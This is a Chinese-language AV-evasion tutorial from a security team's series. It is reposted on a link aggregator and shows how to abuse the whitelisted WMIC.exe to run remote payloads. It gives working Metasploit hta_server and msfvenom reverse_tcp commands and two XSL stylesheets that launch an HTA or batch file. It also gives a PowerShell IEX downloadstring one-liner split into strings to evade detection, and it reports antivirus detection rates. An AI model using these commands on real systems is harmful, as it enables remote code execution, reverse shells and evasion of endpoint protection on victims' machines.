17

远控免杀专题(53)-白名单WMIC.exe执行payload

 4 years ago
source link: http://mp.weixin.qq.com/s?__biz=Mzg2NTA4OTI5NA%3D%3D&%3Bmid=2247486121&%3Bidx=1&%3Bsn=ade673ecedab646005d3401fea66d77a
Go to the source link to view the article. You can view the picture content, updated content and better typesetting reading experience. If the link is broken, please click the button below to view the snapshot at that time.

7bYrqae.jpg!web

声明: Tide安全团队原创文章,转载请声明出处! 文中所涉及的技术、思路和工具仅供以安全为目的的学习交流使用,任何人不得将其用于非法用途以及盈利等目的,否则后果自行承担!

声明:文中所涉及的技术、思路和工具仅供以安全为目的的学习交流使用,任何人不得将其用于非法用途以及盈利等目的,否则后果自行承担!

文章打包下载及相关软件下载: https://github.com/TideSec/BypassAntiVirus

一、WMIC介绍

WMIC扩展WMI(Windows Management Instrumentation,Windows管理工具),提供了从命令行接口和批命令脚本执行系统管理的支持。在WMIC出现之前,如果要管理WMI系统,必须使用一些专门的WMI应用,例如SMS,或者使用WMI的脚本编程API,或者使用象CIM Studio之类的工具。如果不熟悉C++之类的编程语言或VBScript之类的脚本语言,或者不掌握WMI名称空间的基本知识,要用WMI管理系统是很困难的。WMIC改变了这种情况。

二、WMIC使用

Windows 2003 默认位置:

C:\WINDOWS\system32\wbem\wmic.exe C:\WINDOWS\SysWOW64\wbem\wmic.exe

Windows 7 默认位置:

C:\Windows\System32\wbem\WMIC.exe C:\Windows\SysWOW64\wbem\WMIC.exe

远程执行脚本方式

wmic os get /FORMAT:"http://10.211.55.10/payload.xsl"

三、使用WMIC远程加载payload

wmic可以远程执行任何文件或脚本,因此我们将在XSL代码中链接一个hta文件。XSL文件将包含一个链接,用于通过mshta.exe下载并执行恶意hta文件,该文件由wmic触发。

3.1 利用metasploit

在metasploit的帮助下生成一个hta文件

use exploit/windows/misc/hta_server

set SRVPORT 8088

set srvhost 10.211.55.10

nUvaQjm.jpg!web

并放置在hta文件的链接 payload.xsl

<?xml version='1.0'?>

<stylesheet

xmlns="http://www.w3.org/1999/XSL/Transform" xmlns:ms="urn:schemas-microsoft-com:xslt"

xmlns:user="placeholder"

version="1.0">

<output method="text"/>

<ms:script implements-prefix="user" language="JScript">

<![CDATA[

var r = new ActiveXObject("WScript.Shell").Run("http://10.211.55.10:8088/0lEkSQQmpPP.hta");

]]> </ms:script>

</stylesheet>

目标机器上wmic运行

wmic os get /FORMAT:"http://10.211.55.10/payload.xsl"

执行后hta木马遭到火绒查杀,360提示powershell命令攻击。

EzyUZrF.jpg!web

点击允许后可上线。

3eMR3yy.jpg!web

查看hta文件使用了powershell加载木马

qQZbYfR.jpg!web

将该hta放在virustotal.com上面检测,查杀率28/56

n6VFFrv.jpg!web

3.2 自定义免杀

刚才发现hta文件使用了powershell,遭到拦截。我们重新修改一下。这里payload选择使用powershell

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.211.55.10 LPORT=8080 -f psh-reflection > a.ps1

使用powershell的IEX加载payload,并进行混淆

powershell "$a='IEX((new-object net.webclient).downloadstring(''ht';$b='tp://10.211.55.10/a.ps1''))';IEX ($a+$b)"

将该命令重命名为a.bat。使用wmic.exe加载脚本

wmic os get /FORMAT:"http://10.211.55.10/demo.xsl"

demo.xsl

<?xml version='1.0'?>

<stylesheet

xmlns="http://www.w3.org/1999/XSL/Transform" xmlns:ms="urn:schemas-microsoft-com:xslt"

xmlns:user="placeholder"

version="1.0">

<output method="text"/>

<ms:script implements-prefix="user" language="JScript">

<![CDATA[

var r = new ActiveXObject("WScript.Shell").Run("a.bat");

]]> </ms:script>

</stylesheet>

jeuqa2j.jpg!web

只有火绒提示"powershell执行可疑文件" 点击允许后可上线

jEFnAj2.jpg!web

a.bat在virustotal.com 上面查杀率为3/57

Z3eqQb3.jpg!web

四、参考资料

使用wmic.exe绕过应用程序白名单(多种方法): https://www.cnblogs.com/backlion/p/10489916.html

qINZvmz.png!web

guān

zhù

men

Tide安全团队正式成立于2019年1月 是新潮信息旗下以互联网攻防技术研究为目标的安全团队,团队致力于分享高质量原创文章、开源安全工具、交流安全技术,研究方向覆盖网络攻防、Web安全、移动终端、安全开发、物联网/工控安全/AI安全等多个领域。

对安全感兴趣的小伙伴可以 关注团队官网: http://www.TideSec.com 或长按二维码关注公众号:

QRzqqyB.png!web

maEBfqm.gif


report

Recommend

About Joyk


Aggregate valuable and interesting links.
Joyk means Joy of geeK